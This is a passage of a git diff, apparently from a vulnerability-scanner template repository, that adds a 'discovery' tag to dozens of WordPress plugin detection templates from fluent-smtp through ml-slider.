'(?i)Stable.tag:\s?([\w.]+)' # digest: 4a0a00473045022100a1dca7d50fd8292bb5b8df9bd810ea03f2cf5bad3f841be5a93620ee318efe7202206d81d2e8a218d8d90221b9c6f11298aff80b3d3858a257ce640d7bc3a9fb7c00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index 1ab7b8bb644..bd583086c7f 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: fluent-smtp wpscan: https://wpscan.com/plugin/fluent-smtp - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 0fc7449bc2c..0476ecbc88f 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 006682d93f2..c95a1ff540d 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 95628c26135..ee92bf1a10a 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index dfd0b5f301d..edf1f7a279d 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a7296565244..39e596a384e 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 9dc9eeb4b22..c27539e6508 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7d3b2f0bdd1..cacde1d519b 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/give.yaml b/http/technologies/wordpress/plugins/give.yaml index 49f8e474361..648a6548d68 100644 --- a/http/technologies/wordpress/plugins/give.yaml +++ b/http/technologies/wordpress/plugins/give.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: give wpscan: https://wpscan.com/plugin/give - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 1e5ee1362dd..ac94c08cebd 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index f67a79e933f..9e622bdcd9f 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 9cc0115aef0..ac50cbd1bb1 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index ea7775f2b17..700b255b878 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 665cdc913a3..5e4c0e89b74 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index aa467a7a3d6..2153068ea17 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 8c02f787988..2dc5491977b 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index a86516c18af..9488eade349 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index bf161a6f189..0072d7a1621 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -10,7 +10,7 @@ info: max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 2c876bf8feb..1cabc972b75 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 7a92dafb72f..8317d35dcea 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 31428b88943..3b5a5907926 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index a24c29a743d..ab35b08bf03 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 203eb21b8d7..aa05307a52c 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 8e7d6ba6492..b14c69636d0 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index aa7a14fe0c4..79e7ef871b6 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: hostinger wpscan: https://wpscan.com/plugin/hostinger - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/hunk-companion.yaml b/http/technologies/wordpress/plugins/hunk-companion.yaml index bf1a2457bb0..0f674403413 100644 --- a/http/technologies/wordpress/plugins/hunk-companion.yaml +++ b/http/technologies/wordpress/plugins/hunk-companion.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 1 plugin_namespace: hunk-companion - tags: tech,wordpress,wp-plugin + tags: tech,wordpress,wp-plugin,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index a28994ad9ee..bf8c3087efd 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: image-optimization wpscan: https://wpscan.com/plugin/image-optimization - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index d41609ffa55..afaaa4ac1f2 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 14803090f98..d8e4713fae5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/inpost-for-woocommerce.yaml b/http/technologies/wordpress/plugins/inpost-for-woocommerce.yaml index 49188a76e9c..9e803244e4c 100644 --- a/http/technologies/wordpress/plugins/inpost-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/inpost-for-woocommerce.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: inpost-for-woocommerce wpscan: https://wpscan.com/plugin/inpost-for-woocommerce/ - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 361d6f17c57..6bbe69740ad 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 995c5a83814..7c725bdae73 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 2577c7f2d4f..87faeded1c5 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index e01d0a2ff3c..d0007387614 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/jeg-elementor-kit.yaml b/http/technologies/wordpress/plugins/jeg-elementor-kit.yaml index ca79818f1ae..53a88c97357 100644 --- a/http/technologies/wordpress/plugins/jeg-elementor-kit.yaml +++ b/http/technologies/wordpress/plugins/jeg-elementor-kit.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: jeg-elementor-kit wpscan: https://wpscan.com/plugin/jeg-elementor-kit - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index b352c2c09cb..c8064b8f5d8 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 620172a827b..35fee63b8db 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index f9a96c44fd7..8a8e76bb885 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index bd22d956054..56d542080cc 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 48a5ac13a91..37a2a6ecf9e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 94e3e07e4f7..4b3b93e73fc 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index a30b182e96b..74c62bc019f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index d3ff6ee9ecd..d3d187fa19e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 7ee7a20037d..49286f78a2a 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 047b3e57b33..5d878ffce88 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index b305cb964f9..6da20222e23 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -10,7 +10,7 @@ info: max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index d6e829180e6..fe9b7df2e6e 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 7fa12314021..b96fd736b1c 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 6e06b7b9afd..0a4892b5801 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index bc5e2ba040f..da86afc083f 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 0b529a90865..f36a2ae28db 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 7c7e9395912..e54e703ebe4 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index ab2c4fdb16c..4e5dde7400a 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index e9dd98a0d02..f72f3b97468 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: members wpscan: https://wpscan.com/plugin/members - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 5297aa97869..ba9aa6d6856 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 02508a3d98e..cb637c92f06 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: metform wpscan: https://wpscan.com/plugin/metform - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 609cdc2b4a1..e70b0e44666 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff 